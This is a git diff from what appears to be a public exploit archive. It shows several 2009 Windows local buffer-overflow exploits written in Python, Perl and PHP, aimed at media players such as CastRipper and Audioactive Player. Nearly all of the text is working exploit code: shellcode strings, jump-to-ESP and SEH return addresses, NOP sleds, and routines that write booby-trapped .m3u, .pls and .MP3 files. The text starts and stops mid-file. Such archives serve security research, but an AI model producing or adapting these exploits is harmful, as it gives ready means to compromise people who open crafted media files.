+print " Exploit code: super-cristal\n"
+print " Tested on: Windows XP Pro SP3\n"
+print " Greetings to:"
+print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n"
+print "**************************************************************************"
+     
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com	 
+shellcode=(
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x53\x4b\x38\x4e\x57"
+"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
+"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x38"
+"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44"
+"\x4b\x58\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a"
+"\x4b\x58\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x43"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
+"\x42\x55\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46"
+"\x4e\x46\x43\x36\x42\x50\x5a")
+
+buff =  "\x41" * 17367
+buff += "\x7D\xBC\x01\x10" # universal jmp esp
+buff += "\x90"*20
+buff += shellcode
+
+try:
+    out_file = open("exploit.m3u",'w')
+    out_file.write(buff)
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8663.pl b/platforms/windows/local/8663.pl
index acd6ee30d..4a2a90468 100755
--- a/platforms/windows/local/8663.pl
+++ b/platforms/windows/local/8663.pl
@@ -1,29 +1,29 @@
-#!/usr/bin/perl
-# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
-# Exploited By : zAx
-# ThE-zAx@HoTMaiL.CoM
-print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
-print "Exploited By : zAx";
-print "Contact at : ThE-zAx@HoTMaiL.CoM";
-$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
-$junk = "\x41" x 26369;
-$eip="\x7D\xBC\x01\x10"; # Universal
-$nopsled = "\x90" x 10;
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-$shellcode =
-"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
-"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
-"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
-"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
-"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
-"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
-"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
-"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
-"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
-"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
-open(zax,">>zAx.pls");
-print zax $header.$junk.$eip.$nopsled.$shellcode;
-print "[+] Done !! [+]";
-close(zax);
-
-# milw0rm.com [2009-05-12]
+#!/usr/bin/perl
+# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
+# Exploited By : zAx
+# ThE-zAx@HoTMaiL.CoM
+print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";
+print "Exploited By : zAx";
+print "Contact at : ThE-zAx@HoTMaiL.CoM";
+$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";
+$junk = "\x41" x 26369;
+$eip="\x7D\xBC\x01\x10"; # Universal
+$nopsled = "\x90" x 10;
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+$shellcode =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".
+"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".
+"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".
+"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".
+"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".
+"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".
+"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".
+"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".
+"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".
+"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";
+open(zax,">>zAx.pls");
+print zax $header.$junk.$eip.$nopsled.$shellcode;
+print "[+] Done !! [+]";
+close(zax);
+
+# milw0rm.com [2009-05-12]
diff --git a/platforms/windows/local/8670.php b/platforms/windows/local/8670.php
index 09586c5b0..42bb856bd 100755
--- a/platforms/windows/local/8670.php
+++ b/platforms/windows/local/8670.php
@@ -1,58 +1,58 @@
-
-
-# milw0rm.com [2009-05-13]
+
+
+# milw0rm.com [2009-05-13]
diff --git a/platforms/windows/local/8698.pl b/platforms/windows/local/8698.pl
index 9cb29704d..3c0bbf7e7 100755
--- a/platforms/windows/local/8698.pl
+++ b/platforms/windows/local/8698.pl
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
-# Greetz to all my friends
-# From EGYPT
-##################################################################
-my $bof="\x41" x 224;
-my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
-my $nop="\x90" x 24;
-##################################################################
-# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
-"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
-"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
-"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".
-"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".
-"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".
-"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".
-"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".
-"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".
-"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";
-##################################################################
-open(myfile,'>>hack4love.m3u');
-print myfile $bof.$ret.$nop.$shellcode;
-# Tested on: Windows XP Pro SP2 (EN)
-##################################################################
-
-# milw0rm.com [2009-05-15]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
+# Greetz to all my friends
+# From EGYPT
+##################################################################
+my $bof="\x41" x 224;
+my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
+my $nop="\x90" x 24;
+##################################################################
+# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $shellcode =
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
+"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
+"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
+"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".
+"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".
+"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".
+"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".
+"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".
+"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".
+"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";
+##################################################################
+open(myfile,'>>hack4love.m3u');
+print myfile $bof.$ret.$nop.$shellcode;
+# Tested on: Windows XP Pro SP2 (EN)
+##################################################################
+
+# milw0rm.com [2009-05-15]
diff --git a/platforms/windows/local/8701.py b/platforms/windows/local/8701.py
index 26ac8275b..2a4a5dfc7 100755
--- a/platforms/windows/local/8701.py
+++ b/platforms/windows/local/8701.py
@@ -1,41 +1,41 @@
-#usage: exploit.py
-#Open the program then double clic in the exploit file
-print "**************************************************************************"
-print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\n"
-print " Credits : hack4love\n"
-print " Seh Exploit: His0k4\n"
-print " Tested on: Windows XP Pro SP3 (EN)\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz),snakespc.com\n"
-print "**************************************************************************"       
-			
-# win32_exec -  EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
-shellcode=(
-"\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
-"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x97\x59\x3c\x21"
-"\xd2\x65\xb7\x49\xd8\xed\xc6\x5e\x69\x42\xd1\x2b\x31\x7c\xe0\xc0"
-"\x87\xf7\xd6\x9d\x19\xe9\x26\x62\x80\x59\xcc\xa2\xc7\xa6\x0c\xe8"
-"\x25\xa9\x4c\x06\xc1\x92\x04\xfd\x2e\x91\x41\x76\x71\x7d\x8b\x62"
-"\xe8\xf6\x87\x3f\x7e\x57\x84\xbe\x6b\xec\xa8\x4b\x6a\x19\x59\x17"
-"\x49\xd9\x99\x99\x51\x85\x96\x9a\x61\xc0\x69\x62\x8e\x41\x29\x9f"
-"\x05\x25\xb6\x32\x92\xad\xce\xa7\xac\xa6\x4f\x87\xaf\xb8\x4f\x63"
-"\xc7\x84\x10\x42\xee\x94\xf8\x2d\xf6\xd7\xc5\x55\x57\xbf\x35\x23"
-"\x53\x60\xde\xac\xa2\x14\x10\x9a\xa5\xcf\x4e\x45\x36\x6c\x91\x85"
-"\xc6\x72\x91\x85\xc6")
-
-payload = "\x41"*(589-len(shellcode))
-payload += shellcode
-payload += "\xE9\x56\xFF\xFF\xFF" # go back
-payload += "\x74\xF9\xFF\xFF" #go back
-payload += "\xDE\x19\xD1\x72" # Friendly p/p/r msacm32.drv
-payload += "\x44"*900
-
-try:
-    out_file = open("exploit.m3u",'w')
-    out_file.write("http://www.google.com/"+payload+".mp3\r\n")
-    out_file.close()
-    raw_input("\nExploit file created!\n")
-except:
-    print "Error"
-
-# milw0rm.com [2009-05-15]
+#usage: exploit.py
+#Open the program then double clic in the exploit file
+print "**************************************************************************"
+print " Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)\n"
+print " Credits : hack4love\n"
+print " Seh Exploit: His0k4\n"
+print " Tested on: Windows XP Pro SP3 (EN)\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz),snakespc.com\n"
+print "**************************************************************************"       
+			
+# win32_exec -  EXITFUNC=seh CMD=calc Size=165 Encoder=JmpCallAdditive http://metasploit.com
+shellcode=(
+"\xfc\xbb\x5d\x53\x65\x97\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
+"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xa1\xbb\x21\x97\x59\x3c\x21"
+"\xd2\x65\xb7\x49\xd8\xed\xc6\x5e\x69\x42\xd1\x2b\x31\x7c\xe0\xc0"
+"\x87\xf7\xd6\x9d\x19\xe9\x26\x62\x80\x59\xcc\xa2\xc7\xa6\x0c\xe8"
+"\x25\xa9\x4c\x06\xc1\x92\x04\xfd\x2e\x91\x41\x76\x71\x7d\x8b\x62"
+"\xe8\xf6\x87\x3f\x7e\x57\x84\xbe\x6b\xec\xa8\x4b\x6a\x19\x59\x17"
+"\x49\xd9\x99\x99\x51\x85\x96\x9a\x61\xc0\x69\x62\x8e\x41\x29\x9f"
+"\x05\x25\xb6\x32\x92\xad\xce\xa7\xac\xa6\x4f\x87\xaf\xb8\x4f\x63"
+"\xc7\x84\x10\x42\xee\x94\xf8\x2d\xf6\xd7\xc5\x55\x57\xbf\x35\x23"
+"\x53\x60\xde\xac\xa2\x14\x10\x9a\xa5\xcf\x4e\x45\x36\x6c\x91\x85"
+"\xc6\x72\x91\x85\xc6")
+
+payload = "\x41"*(589-len(shellcode))
+payload += shellcode
+payload += "\xE9\x56\xFF\xFF\xFF" # go back
+payload += "\x74\xF9\xFF\xFF" #go back
+payload += "\xDE\x19\xD1\x72" # Friendly p/p/r msacm32.drv
+payload += "\x44"*900
+
+try:
+    out_file = open("exploit.m3u",'w')
+    out_file.write("http://www.google.com/"+payload+".mp3\r\n")
+    out_file.close()
+    raw_input("\nExploit file created!\n")
+except:
+    print "Error"
+
+# milw0rm.com [2009-05-15]
diff --git a/platforms/windows/local/8780.php b/platforms/windows/local/8780.php
index 9ae9fec3d..d3c3afd91 100755
--- a/platforms/windows/local/8780.php
+++ b/platforms/windows/local/8780.php
@@ -1,120 +1,120 @@
- "cli")
-        {
-                die("[!] Launch from the cli!");
-        }
-         
-        $____scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53". "\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d
-        "\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 0x7c81cb12
-        "\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65". "\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff";
-         
-        if (strlen($____scode) > 118)
-        {
-                die("[!] Shellcode too large here!");
-        }
-        $____BOOM = "\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00". str_repeat("\x90", 0x7c).//nop, very reusable
-        "\xeb\x06\x90\x90". //jmp short
-         
-        //"\x01\x01\x06\x01". //less usually in this location...
-        "\x01\x01\x05\x01". //eax - ecx, this works 80% of the times
-        "\x90\x90\x90\x90". //nop
-        $____scode. str_repeat("A", 0x01f0 - strlen($____scode)). "\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f". "\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00". "\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x33\x36\x38". "\x3b\x3d\x40\x42\x45\x48\x4a\x4d\x4f\x51\x54\x57\x59\x5c\x5f\x61\x63\x66\x69\x6b\x6e\x71\x73\x76\x78\x7a\x7d\x80\x82\x85\x88\x8a". "\x8c\x8f\x92\x94\x97\x9a\x9c\x9e\xa1\xa3\xa6\xa9\xab\xae\xb1\xb2\xb5\xb8\xba\xbd\xc0\xc3\xc4\xc7\xca\xcc\xcf\xd2\xd4\xd7\xd9\xdb". "\xde\xe1\xe3\xe6\xe9\xeb\xed\xf0\xf3\xf5\xf8\xfb\xfd\x00\x00\x00\x37\x4c\x41\x4d\x45\x33\x2e\x39\x38\x20\x01\xaa\x00\x00\x00\x00". "\x00\x00\x00\x00\x14\x80\x24\x04\xc7\x4e\x00\x00\x80\x00\x07\x57\x2e\x4f\x7b\xf5\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfb\x90\x64\x00\x09\xf3\x50\x68\xbc". "\xb0\x42\x83\x72\x00\x00\x0d\x20\x00\x00\x01\x14\x35\xa8\xf0\x04\x3e\x8d\xc8\x00\x00\x34\x80\x00\x00\x04\x00\x20\xc0\x01\xf2\x67". "\x21\x27\x0e\x60\x05\x16\x77\x3c\x84\x69\xc8\xdf\xff\xff\xf3\x9d\xe4\x21\x18\xe0\x00\x04\x65\xa6\x9a\x74\xcb\xe5\xf2\x7d\x22\x18". "\x18\xd0\x58\x43\x15\x8a\x50\xd4\x73\xc9\xf2\xfb\xa0\x82\x09\xbd\x48\x20\x85\x68\x20\x85\x34\xd3\xa9\x37\x41\x66\xea\x41\xbf\xab". "\x41\x04\x2b\x4d\x37\xa6\x9b\xd0\x41\x0d\x06\xff\xff\xff\xad\x34\xd2\x20\x06\xa4\xd9\xbb\xad\x34\xd3\xd0\x41\xaa\x41\xb5\xff\xd3". "\x48\xdd\x46\x0f\xf6\x8b\xd4\x95\x75\x15\x24\x60\x4c\x3f\xc8\x95\x53\x6c\x09\x23\x5b\x55\xae\xbd\x73\xaf\xbc\x7c\xfd\xeb\x3f\x5f". "\x74\x92\x29\x7f\x2e\x71\xa2\x67\x78\xc7\xdd\xbd\xeb\x5a\xef\x35\x7a\x8b\x4b\xc4\xd1\x74\xd5\x44\x08\x59\xc2\x52\x10\x18\x03\x65". "\x80\xe2\x81\x85\x43\xb2\x5d\x26\x88\xb1\x16\x27\x92\x5a\x46\xc6\x49\x3d\x13\x13\x54\x98\xc4\xc4\xd5\x92\x32\x76\x3e\x4d\x0b\x34". "\x6b\x1b\xa6\x79\x16\x5d\x9d\x2a\xd1\x4a\x89\x89\xab\x24\x64\x93\x4c\x8c\x9d\xcf\x14\x46\x5c\x64\x0e\xb9\xe5\xba\xb7\xd7\xba\xaa". "\xba\x96\xb6\xa4\x75\x48\x13\xc1\xf1\x05\x04\x97\x12\x27\x8c\x51\x64\x8b\xc9\x3d\x13\x24\x9d\x91\x47\x75\xd4\xee\xc8\xb9\x18\x62". "\x28\xe5\xa2\xeb\xca\xb2\x7b\x9b\xcb\x17\x77\x57\x84\x20\x04\x09\x49\x4a\x87\xb2\x30\x2b\x22\x52\x9f\x1a\xa7\xfa\xce\xfd\xef\x47". "\x94\xa3\xc8\x90\x1e\x66\x25\x91\xa3\xd4\xe2\xc7\x1f\x3b\x7f\x1e\xf7\xbc\x37\xef\xe3\xd3\x3e\x9a\x65\xf3\x76\x93\x65\xf2\xf8\xe5". "\x86\x47\x04\xf2\x81\xb6\x00\x16\x6c\x65\x4a\xef\x74\x10\x41\x37\x6a\x08\x20\x60\x68\x99\x9a\x69\x9b\xbd\x35\x1c\x27\x0c\x48\x99". "\x38\x4e\x13\x64\xfb\xa1\x98\x17\x10\x41\x74\xd3\x4d\x34\x19\x6b\x2f\x9a\x54\x82\x88\xa1\x38\xff\xfb\x92\x64\x38\x8d\xf5\x62\x6a". "\xbb\x81\x0f\xa3\x72\x00\x00\x0d\x20\x00\x00\x01\x0e\x71\x6a\xf2\x21\x8e\x0d\xc8\x00\x00\x34\x80\x00\x00\x04\x66\x1d\x51\x49\x92". "\x44\x50\xd0\xc0\xd1\x03\x03\x43\x74\xd3\xad\xf5\x3a\xb4\x18\xc0\xb8\x79\x33\x33\x83\x5c\x2c\x18\x2c\x64\xb8\xb2\xf9\x99\x7d\x34". "\xd4\x87\x41\x69\xd4\x60\x68\xd4\xd6\x66\x6f\x98\x11\x03\xa2\xe5\x36\x4c\xa0\x79\x34\xe5\xdd\xaa\xfb\x36\xca\x14\x04\x04\x04\x98";
-        $____x = 0x35;
-        $____v = (strlen($_SERVER["USERPROFILE"]) % 4);
-        $____x = $____x - $____v;
-        //addresses that worked for me...
-        //$____pad = str_repeat("\x73\xb2\x42\x77",$____x); //0x7742b27f COMCTL32.DLL->0x10003dcc call edi, JetCFG.dll
-        //$____pad = str_repeat("\xe9\x62\xe0\x77",$____x); //0x77e062f5 RPCRT4.DLL->0x7d03388b call edi, SHELL32.DLL
-        //$____pad = str_repeat("\x23\xa2\xae\x76",$____x); //0x76aea22f ATL.DLL->0x10003dcc call edi, JetCFG.dll
-        $____pad = str_repeat("\xf3\xa5\xc0\x77", $____x); //0x77c0a5ff MSVCRT.DLL->0x10003dcc call edi, JetCFG.dll, best one
-        for ($i = 0; $i < 4; $i++)
-        {
-                $____junk = str_repeat("_", $i);
-                $____fname = "_9sg__mzk_".$____junk.$____pad.".MP3";
-                $____path = $_SERVER["USERPROFILE"]."\\Desktop\\".$____fname;
-                $____x = fopen($____path, "w+");
-                if (!$____x)
-                {
-                        die("[!] Unable to create ".$____path." ...");
-                }
-                fputs ($____x, $____BOOM);
-                fclose($____x);
-                print("[*] ".$____path." created!\n");
-                if ($i == $____v)
-                        {
-                        print("[?] This will hit the right offset on your system! Do you like my composition?\n");
-                }
-        }
-?>
-
-# milw0rm.com [2009-05-26]
+ "cli")
+        {
+                die("[!] Launch from the cli!");
+        }
+         
+        $____scode = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53". "\xbb\x0d\x25\x86\x7c". //WinExec, 0x7c86250d
+        "\xff\xd3\x31\xc0\x50". "\xbb\x12\xcb\x81\x7c". //ExitProcess, 0x7c81cb12
+        "\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65". "\x78\x65\x20\x2f\x63\x20". "cmd /c calc && ". "\xff";
+         
+        if (strlen($____scode) > 118)
+        {
+                die("[!] Shellcode too large here!");
+        }
+        $____BOOM = "\x49\x44\x33\x03\x00\x00\x00\x00\x07\x7b\x54\x49\x54\x32\x00\x00\x03\xbe\x00\x00\x00". str_repeat("\x90", 0x7c).//nop, very reusable
+        "\xeb\x06\x90\x90". //jmp short
+         
+        //"\x01\x01\x06\x01". //less usually in this location...
+        "\x01\x01\x05\x01". //eax - ecx, this works 80% of the times
+        "\x90\x90\x90\x90". //nop
+        $____scode. str_repeat("A", 0x01f0 - strlen($____scode)). "\x54\x41\x4c\x42\x00\x00\x00\x02\x00\x00\x00\x31\x54\x59\x45\x52\x00\x00\x00\x05\x00\x00\x00\x31\x39\x35\x30\x54\x43\x4f". "\x4e\x00\x00\x00\x02\x00\x00\x00\x31\x54\x43\x4f\x50\x00\x00\x00\x02\x00\x00\x00\x31\xff\xfb\x90\x64\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x6e\x66\x6f\x00\x00\x00". "\x0f\x00\x00\x04\x7e\x00\x07\x57\x2e\x00\x02\x05\x08\x0a\x0d\x10\x12\x14\x17\x19\x1c\x1f\x21\x24\x27\x28\x2b\x2e\x30\x33\x36\x38". "\x3b\x3d\x40\x42\x45\x48\x4a\x4d\x4f\x51\x54\x57\x59\x5c\x5f\x61\x63\x66\x69\x6b\x6e\x71\x73\x76\x78\x7a\x7d\x80\x82\x85\x88\x8a". "\x8c\x8f\x92\x94\x97\x9a\x9c\x9e\xa1\xa3\xa6\xa9\xab\xae\xb1\xb2\xb5\xb8\xba\xbd\xc0\xc3\xc4\xc7\xca\xcc\xcf\xd2\xd4\xd7\xd9\xdb". "\xde\xe1\xe3\xe6\xe9\xeb\xed\xf0\xf3\xf5\xf8\xfb\xfd\x00\x00\x00\x37\x4c\x41\x4d\x45\x33\x2e\x39\x38\x20\x01\xaa\x00\x00\x00\x00". "\x00\x00\x00\x00\x14\x80\x24\x04\xc7\x4e\x00\x00\x80\x00\x07\x57\x2e\x4f\x7b\xf5\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfb\x90\x64\x00\x09\xf3\x50\x68\xbc". 